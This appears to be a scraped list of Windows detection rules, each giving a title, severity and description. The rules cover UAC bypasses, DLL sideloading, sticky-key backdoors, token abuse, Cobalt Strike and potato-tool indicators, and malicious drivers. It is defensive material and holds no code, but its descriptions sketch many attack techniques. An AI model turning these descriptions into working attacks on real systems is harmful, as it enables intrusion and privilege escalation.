User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'highThe 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.
WMI Persistence - SecuritymediumDetects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.
DiagTrackEoP Default Login UsernamecriticalDetects the default "UserName" used by the DiagTrackEoP POC
Potential Access Token AbusemediumDetects potential token impersonation and theft. Example, when using "DuplicateToken(Ex)" and "ImpersonateLoggedOnUser" with the "LOGON32_LOGON_NEW_CREDENTIALS flag".
Potential Privilege Escalation via Local Kerberos Relay over LDAPhighDetects a suspicious local successful logon event where the Logon Package is Kerberos, the remote address is set to localhost, and the target user SID is the built-in local Administrator account. This may indicate an attempt to leverage a Kerberos relay attack variant that can be used to elevate privilege locally from a domain joined limited user to local System privileges.
RottenPotato Like Attack PatternhighDetects logon events that have characteristics of events generated during an attack with RottenPotato and the like
KDC RC4-HMAC Downgrade CVE-2022-37966highDetects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation
Certificate Use With No Strong MappingmediumDetects a user certificate that was valid but could not be mapped to a user in a strong way (such as via explicit mapping, key trust mapping, or a SID) This could be a sign of exploitation of the elevation of privilege vulnerabilities (CVE-2022-34691, CVE-2022-26931, CVE-2022-26923) that can occur when the KDC allows certificate spoofing by not requiring a strong mapping. Events where the AccountName and CN of the Subject do not match, or where the CN ends in a dollar sign indicating a machine, may indicate certificate spoofing.
Vulnerable Netlogon Secure Channel Connection AllowedhighDetects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.
CobaltStrike Service Installations - SystemcriticalDetects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement
KrbRelayUp Service InstallationhighDetects service creation from KrbRelayUp tool used for privilege escalation in Windows domain environments where LDAP signing is not enforced (the default settings)
Meterpreter or Cobalt Strike Getsystem Service Installation - SystemhighDetects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation
Moriya Rootkit - SystemcriticalDetects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report
New PDQDeploy Service - Server SidemediumDetects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines. PDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines
New PDQDeploy Service - Client SidemediumDetects PDQDeploy service installation on the target system. When a package is deployed via PDQDeploy it installs a remote service on the target machine with the name "PDQDeployRunner-X" where "X" is an integer starting from 1
ProcessHacker Privilege ElevationhighDetects a ProcessHacker tool that elevated privileges to a very high level
Sliver C2 Default Service InstallationhighDetects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands
Service Installed By Unusual Client - SystemhighDetects a service installed by a client which has PID 0 or whose parent has PID 0
Suspicious Service InstallationhighDetects suspicious service installation commands
Uncommon Service Installation Image PathmediumDetects uncommon service installation commands by looking at suspicious or uncommon image path values containing references to encoded powershell commands, temporary paths, etc.
Service Installation in Suspicious FoldermediumDetects service installation in suspicious folder appdata
Service Installation with Suspicious Folder PatternhighDetects service installation with suspicious folder patterns
Suspicious Service Installation ScripthighDetects suspicious service installation scripts
WMI PersistencemediumDetects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.
Rare Remote Thread Creation By Uncommon Source ImagehighDetects uncommon processes creating remote threads.
Remote Thread Creation By Uncommon Source ImagemediumDetects uncommon processes creating remote threads.
Remote Thread Creation In Uncommon Target ImagemediumDetects uncommon target processes for remote thread creation
Malicious Driver LoadhighDetects loading of known malicious drivers via their hash.
PUA - System Informer Driver LoadmediumDetects driver load of the System Informer tool
Malicious Driver Load By NamemediumDetects loading of known malicious drivers via the file name of the drivers.
Driver Load From A Temporary DirectoryhighDetects a driver load from a temporary directory
PUA - Process Hacker Driver LoadhighDetects driver load of the Process Hacker tool
Vulnerable Driver Load By NamelowDetects the load of known vulnerable drivers via the file name of the drivers.
Vulnerable HackSys Extreme Vulnerable Driver LoadhighDetects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors
Vulnerable WinRing0 Driver LoadhighDetects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation
Vulnerable Driver LoadhighDetects loading of known vulnerable drivers via their hash.
Potential PrintNightmare Exploitation AttempthighDetect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675
Creation Of Non-Existent System DLLmediumDetects the creation of system DLLs that are usually not present on the system (or at least not in system directories). Usually this technique is used to achieve DLL hijacking.
DLL Search Order Hijackig Via Additional Space in PathhighDetects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...) but with a space in order to trick DLL load search order and perform a "DLL Search Order Hijacking" attack
HackTool - Powerup Write Hijack DLLhighPowerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. In it's default mode, it builds a self deleting .bat file which executes malicious command. The detection rule relies on creation of the malicious bat file (debug.bat by default).
Malicious DLL File Dropped in the Teams or OneDrive FolderhighDetects creation of a malicious DLL file in the location where the OneDrive or Team applications Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded
PowerShell Profile ModificationmediumDetects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
VsCode Powershell Profile ModificationmediumDetects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
LiveKD Kernel Memory Dump File CreatedhighDetects the creation of a file that has the same name as the default LiveKD kernel memory dump.
LiveKD Driver CreationmediumDetects the creation of the LiveKD driver, which is used for live kernel debugging
LiveKD Driver Creation By Uncommon ProcesshighDetects the creation of the LiveKD driver by a process image other than "livekd.exe".
Process Explorer Driver Creation By Non-Sysinternals BinaryhighDetects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself. Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards.
Process Monitor Driver Creation By Non-Sysinternals BinarymediumDetects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself.
PSEXEC Remote Execution File ArtefacthighDetects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system
Potential Privilege Escalation Attempt Via .Exe.Local TechniquehighDetects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll"
UAC Bypass Using Consent and Comctl32 - FilehighDetects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
UAC Bypass Using .NET Code Profiler on MMChighDetects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)
UAC Bypass Using EventVwrhighDetects the pattern of a UAC bypass using Windows Event Viewer
UAC Bypass Using IDiagnostic Profile - FilehighDetects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique
UAC Bypass Using IEInstal - FilehighDetects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
UAC Bypass Using MSConfig Token Modification - FilehighDetects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
UAC Bypass Using NTFS Reparse Point - FilehighDetects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
UAC Bypass Abusing Winsat Path Parsing - FilehighDetects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
UAC Bypass Using Windows Media Player - FilehighDetects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
Potential Azure Browser SSO AbuselowDetects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser. An attacker can use this to authenticate to Azure AD in a browser as that user.
WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL LoadmediumDetects signs of the WMI script host process "scrcons.exe" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity.
Potential 7za.DLL SideloadinglowDetects potential DLL sideloading of "7za.dll"
Potential Antivirus Software DLL SideloadingmediumDetects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc
Potential appverifUI.DLL SideloadinghighDetects potential DLL sideloading of "appverifUI.dll"
Aruba Network Service Potential DLL SideloadinghighDetects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking
Potential AVKkid.DLL SideloadingmediumDetects potential DLL sideloading of "AVKkid.dll"
Potential CCleanerDU.DLL SideloadingmediumDetects potential DLL sideloading of "CCleanerDU.dll"
Potential CCleanerReactivator.DLL SideloadingmediumDetects potential DLL sideloading of "CCleanerReactivator.dll"
Potential Chrome Frame Helper DLL SideloadingmediumDetects potential DLL sideloading of "chrome_frame_helper.dll"
Potential DLL Sideloading Via ClassicExplorer32.dllmediumDetects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software
Potential DLL Sideloading Via comctl32.dllhighDetects potential DLL sideloading using comctl32.dll to obtain system privileges
Potential DLL Sideloading Of DBGCORE.DLLmediumDetects DLL sideloading of "dbgcore.dll"
Potential DLL Sideloading Of DBGHELP.DLLmediumDetects potential DLL sideloading of "dbghelp.dll"
Potential EACore.DLL SideloadinghighDetects potential DLL sideloading of "EACore.dll"
Potential Edputil.DLL SideloadinghighDetects potential DLL sideloading of "edputil.dll"
Potential System DLL Sideloading From Non System LocationshighDetects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).
Potential Goopdate.DLL SideloadingmediumDetects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe
Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXEmediumDetects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location
Potential Iviewers.DLL SideloadinghighDetects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer)
Potential DLL Sideloading Via JsSchHlpmediumDetects potential DLL sideloading using JUSTSYSTEMS Japanese word processor
Potential DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXEhighDetects potential DLL side loading of "KeyScramblerIE.dll" by "KeyScrambler.exe". Various threat actors and malware have been found side loading a masqueraded "KeyScramblerIE.dll" through "KeyScrambler.exe".
Potential Libvlc.DLL SideloadingmediumDetects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe"
Potential Mfdetours.DLL SideloadingmediumDetects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution.
Unsigned Mfdetours.DLL SideloadinghighDetects DLL sideloading of unsigned "mfdetours.dll". Executing "mftrace.exe" can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution.
Potential DLL Sideloading Of Non-Existent DLLs From System FoldershighDetects DLL sideloading of system DLLs that are not present on the system by default (at least not in system directories). Usually this technique is used to achieve UAC bypass or privilege escalation.
Microsoft Office DLL SideloadhighDetects DLL sideloading of DLLs that are part of Microsoft Office from non standard location
Potential Rcdll.DLL SideloadinghighDetects potential DLL sideloading of rcdll.dll
Potential RjvPlatform.DLL Sideloading From Default LocationmediumDetects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default.
Potential RjvPlatform.DLL Sideloading From Non-Default LocationhighDetects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location.
Potential RoboForm.DLL SideloadingmediumDetects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager
Potential ShellDispatch.DLL SideloadingmediumDetects potential DLL sideloading of "ShellDispatch.dll"
DLL Sideloading Of ShellChromeAPI.DLLhighDetects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL. Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
Potential SmadHook.DLL SideloadinghighDetects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus
Potential SolidPDFCreator.DLL SideloadingmediumDetects potential DLL sideloading of "SolidPDFCreator.dll"
Third Party Software DLL SideloadingmediumDetects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)
Potential Vivaldi_elf.DLL SideloadingmediumDetects potential DLL sideloading of "vivaldi_elf.dll"
VMGuestLib DLL SideloadmediumDetects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.
VMMap Signed Dbghelp.DLL Potential SideloadingmediumDetects potential DLL sideloading of a signed dbghelp.dll by the Sysinternals VMMap.
VMMap Unsigned Dbghelp.DLL Potential SideloadinghighDetects potential DLL sideloading of an unsigned dbghelp.dll by the Sysinternals VMMap.
Potential Waveedit.DLL SideloadinghighDetects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software.
Potential Wazuh Security Platform DLL SideloadingmediumDetects potential DLL side loading of DLLs that are part of the Wazuh security platform
Potential WWlib.DLL SideloadingmediumDetects potential DLL sideloading of "wwlib.dll"
Windows Spooler Service Suspicious Binary LoadinformationalDetect DLL Load from Spooler Service backup folder
DotNet CLR DLL Loaded By Scripting ApplicationshighDetects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.
UAC Bypass Using Iscsicpl - ImageLoadhighDetects the "iscsicpl.exe" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%
UAC Bypass With Fake DLLhighAttempts to load dismcore.dll after dropping it
CobaltStrike Named PipecriticalDetects the creation of a named pipe as used by CobaltStrike
CobaltStrike Named Pipe Pattern RegexcriticalDetects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles
CobaltStrike Named Pipe PatternshighDetects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles
HackTool - CoercedPotato Named Pipe CreationhighDetects the pattern of a pipe name as used by the hack tool CoercedPotato
HackTool - EfsPotato Named Pipe CreationhighDetects the pattern of a pipe name as used by the hack tool EfsPotato
HackTool - DiagTrackEoP Default Named PipecriticalDetects creation of default named pipe used by the DiagTrackEoP POC, a tool that abuses "SeImpersonate" privilege.
HackTool - Koh Default Named PipecriticalDetects creation of default named pipes used by the Koh tool
Malicious Named Pipe CreatedcriticalDetects the creation of a named pipe seen used by known APTs or malware.
HackTool - WinPwn Execution - ScriptBlockhighDetects scriptblock text keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
Modify Group Policy Settings - ScriptBlockLoggingmediumDetect malicious GPO modifications can be used to implement many other malicious behaviors.
PowerShell ShellCodehighDetects Base64 encoded Shellcode
Potential Persistence Via Security Descriptors - ScriptBlockhighDetects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.
Suspicious GetTypeFromCLSID ShellExecutemediumDetects suspicious Powershell code that execute COM Objects
Suspicious Service DACL Modification Via Set-Service Cmdlet - PShighDetects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)
Potential Persistence Via PowerShell User Profile Using Add-ContentmediumDetects calls to "Add-Content" cmdlet in order to modify the content of the user profile and potentially adding suspicious commands for persistence
Abuse of Service Permissions to Hide Services Via Set-Service - PShighDetects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)
Powershell WMI PersistencemediumAdversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.
Uncommon Process Access Rights For Target ImagelowDetects process access request to uncommon target images with a "PROCESS_ALL_ACCESS" access mask.
Function Call From Undocumented COM Interface EditionUpgradeManagermediumDetects function calls from the EditionUpgradeManager COM interface. Which is an interface that is not used by standard executables.
UAC Bypass Using WOW64 Logger DLL HijackhighDetects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)
Interactive AT JobhighDetects an interactive AT job, which may be used as a form of privilege escalation.
Potential Privilege Escalation Using Symlink Between Osk and CmdhighDetects the creation of a symbolic link between "cmd.exe" and the accessibility on-screen keyboard binary (osk.exe) using "mklink". This technique provides an elevated command prompt to the user from the login screen without the need to log in.
Persistence Via Sticky Key BackdoorcriticalBy replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system. When the sticky keys are "activated" the privilleged shell is launched.
Sticky Key Like Backdoor ExecutioncriticalDetects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
Potentially Suspicious Event Viewer Child ProcesshighDetects uncommon or suspicious child processes of "eventvwr.exe" which might indicate a UAC bypass attempt
HackTool - CoercedPotato ExecutionhighDetects the use of CoercedPotato, a tool for privilege escalation
HackTool - CrackMapExec ExecutionhighThis rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
HackTool - Empire PowerShell UAC BypasscriticalDetects some Empire PowerShell UAC bypass methods
HackTool - Impersonate ExecutionmediumDetects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively
HackTool - LocalPotato ExecutionhighDetects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples
Potential Meterpreter/CobaltStrike ActivityhighDetects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting
HackTool - Default PowerSploit/Empire Scheduled Task CreationhighDetects the creation of a schtask via PowerSploit or Empire Default Configuration.
HackTool - SharpUp PrivEsc Tool ExecutioncriticalDetects the use of SharpUp, a tool for local privilege escalation
HackTool - SharpImpersonation ExecutionhighDetects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively
HackTool - SharpDPAPI ExecutionhighDetects the execution of the SharpDPAPI tool based on CommandLine flags and PE metadata. SharpDPAPI is a C# port of some DPAPI functionality from the Mimikatz project.
HackTool - SysmonEOP ExecutioncriticalDetects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120
HackTool - UACMe Akagi ExecutionhighDetects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata
HackTool - winPEAS ExecutionhighWinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz
HackTool - WinPwn ExecutionhighDetects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
Suspicious Shells Spawn by Java Utility KeytoolhighDetects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)
Suspicious Processes Spawned by Java.EXEhighDetects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j)
Shell Process Spawned by Java.EXEmediumDetects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)
Windows Kernel Debugger ExecutionmediumDetects execution of the Windows Kernel Debugger "kd.exe".
Potentially Suspicious Child Process of KeyScrambler.exemediumDetects potentially suspicious child processes of KeyScrambler.exe
Mavinject Inject DLL Into Running ProcesshighDetects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag
Suspicious Child Process Of SQL ServerhighDetects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection.
Suspicious Child Process Of Veeam DabatasecriticalDetects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection.
Potential Persistence Via Netsh Helper DLLmediumDetects the execution of netsh with "add helper" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.
Password Provided In Command Line Of Net.EXEmediumDetects a when net.exe is called with a password in the command line
New Service Creation Using PowerShelllowDetects the creation of a new service using powershell.
Abuse of Service Permissions to Hide Services Via Set-ServicehighDetects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)
PUA - AdvancedRun ExecutionmediumDetects the execution of AdvancedRun utility
PUA - AdvancedRun Suspicious ExecutionhighDetects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts
PUA - Process Hacker ExecutionmediumDetects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc). Process Hacker is a tool to view and manipulate processes, kernel options and other low level options. Threat actors abused older vulnerable versions to manipulate system processes.
PUA - System Informer ExecutionmediumDetects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations
PUA - Wsudo Suspicious ExecutionhighDetects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)
Regedit as Trusted InstallerhighDetects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe
Suspicious Debugger Registration CmdlinehighDetects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).
Potential Privilege Escalation via Service Permissions WeaknesshighDetect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level
Modify Group Policy SettingsmediumDetect malicious GPO modifications can be used to implement many other malicious behaviors.
Suspicious ScreenSave Change by Reg.exemediumAdversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension
Renamed Mavinject.EXE ExecutionhighDetects the execution of a renamed version of the "Mavinject" process. Which can be abused to perform process injection using the "/INJECTRUNNING" flag
Suspicious NTLM Authentication on the Printer Spooler ServicehighDetects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service
Rundll32 Registered COM Objectshighload malicious registered COM objects
Scheduled Task Creation Via Schtasks.EXElowDetects the creation of scheduled tasks by user accounts via the "schtasks" utility.
Uncommon One Time Only Scheduled Task At 00:00highDetects scheduled task creation events that include suspicious actions, and is run once at 00:00
Possible Privilege Escalation via Weak Service PermissionshighDetection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand
New Service Creation Using Sc.EXElowDetects the creation of a new service using the "sc.exe" utility.
New Kernel Driver Via SC.EXEmediumDetects creation of a new service (kernel driver) with the type "kernel"
Service DACL Abuse To Hide Services Via Sc.EXEhighDetects usage of the "sc.exe" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.
Service Security Descriptor Tampering Via Sc.EXEmediumDetection of sc.exe utility adding a new service with special permission which hides that service.
Suspicious Service Path ModificationhighDetects service path modification via the "sc" binary to a suspicious command or path
Potential Shim Database Persistence via Sdbinst.EXEmediumDetects installation of a new shim using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
Uncommon Extension Shim Database Installation Via Sdbinst.EXEmediumDetects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
Sdclt Child ProcessesmediumA General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.
Potential Suspicious Activity Using SeCEditmediumDetects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
Suspicious Spool Service Child ProcesshighDetects suspicious print spool service (spoolsv.exe) child processes.
Abused Debug Privilege by Arbitrary Parent ProcesseshighDetection of unusual child processes by different system processes
Always Install Elevated Windows InstallermediumDetects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege
Suspicious Child Process Created as SystemhighDetection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts
Always Install Elevated MSI Spawned Cmd And PowershellmediumDetects Windows Installer service (msiexec.exe) spawning "cmd" or "powershell"
Elevated System Shell Spawned From Uncommon Parent LocationmediumDetects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges from a uncommon parent location.
Suspicious RunAs-Like Flag CombinationmediumDetects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools
Suspicious New Service CreationhighDetects creation of a new service via "sc" command or the powershell "new-service" cmdlet with suspicious binary paths
Suspicious SYSTEM User Process CreationhighDetects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)
Process Creation Using Sysnative FoldermediumDetects process creation events that use the Sysnative folder (common for CobaltStrike spawns)
Suspect Svchost ActivityhighIt is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.
Bypass UAC via CMSTPhighDetect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files
UAC Bypass Using Disk CleanuphighDetects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)
UAC Bypass Using ChangePK and SLUIhighDetects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)
CMSTP UAC Bypass via COM Object AccesshighDetects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)
UAC Bypass Tools Using ComputerDefaultshighDetects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)
UAC Bypass Using Consent and Comctl32 - ProcesshighDetects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
UAC Bypass Using DismHosthighDetects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)
Bypass UAC via Fodhelper.exehighIdentifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.
UAC Bypass Using Event Viewer RecentViewshighDetects the pattern of UAC Bypass using Event Viewer RecentViews
UAC Bypass Using NTFS Reparse Point - ProcesshighDetects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
UAC Bypass via ICMLuaUtilhighDetects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface
UAC Bypass Using IDiagnostic ProfilehighDetects the "IDiagnosticProfileUAC" UAC bypass technique
UAC Bypass Using IEInstal - ProcesshighDetects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
UAC Bypass via Windows Firewall Snap-In HijackmediumDetects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in
UAC Bypass Using MSConfig Token Modification - ProcesshighDetects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
UAC Bypass Using PkgMgr and DISMhighDetects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)
Potential UAC Bypass Via Sdclt.EXEmediumA General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.
UAC Bypass Abusing Winsat Path Parsing - ProcesshighDetects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
UAC Bypass Using Windows Media Player - ProcesshighDetects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
Bypass UAC via WSReset.exehighDetects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.
UAC Bypass WSResethighDetects the pattern of UAC Bypass via WSReset usable by default sysmon-config
Suspicious Child Process Of Wermgr.EXEhighDetects suspicious Windows Error Reporting manager (wermgr.exe) child process
Whoami.EXE Execution From Privileged ProcesshighDetects the execution of "whoami.exe" by privileged accounts that are often abused by threat actors
Security Privileges Enumeration Via Whoami.EXEhighDetects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.
Suspicious Processes Spawned by WinRMhighDetects suspicious processes including shells spawnd from WinRM host process
WMI Persistence - Script Event ConsumermediumDetects WMI script event consumers
Potential Process Hollowing ActivitymediumDetects when a memory process image does not match the disk image, indicative of process hollowing.
UAC Bypass Via WsresethighUnfixed method for UAC bypass from Windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.
Path To Screensaver Binary ModifiedmediumDetects value modification of registry key containing path to binary used as screensaver.
Shell Open Registry Keys ManipulationhighDetects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)
Sticky Key Like Backdoor Usage - RegistrycriticalDetects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
Bypass UAC Using DelegateExecutehighBypasses User Account Control using a fileless method
Bypass UAC Using SilentCleanup TaskhighDetects the setting of the environement variable "windir" to a non default value. Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task. The SilentCleanup task located in %windir%\system32\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC.
Potential CobaltStrike Service Installations - RegistryhighDetects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.
COM Hijack via SdclthighDetects changes to 'HKCU\Software\Classes\Folder\shell\open\command\DelegateExecute'
Enabling COR Profiler Environment VariablesmediumDetects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured.
Potential Persistence Via GlobalFlagshighDetects registry persistence technique using the GlobalFlags and SilentProcessExit keys
ServiceDll HijackmediumDetects changes to the "ServiceDLL" value related to a service in the registry. This is often used as a method of persistence.
Suspicious Printer Driver Empty ManufacturerhighDetects a suspicious printer driver installation with an empty Manufacturer value
Modify User Shell Folders Startup ValuehighDetect modification of the startup key to a path where a payload could be stored to be launched during startup
New TimeProviders Registered With Uncommon DLL NamehighDetects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.
UAC Bypass via Event ViewerhighDetects UAC bypass method using Windows event viewer
UAC Bypass via SdclthighDetects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)
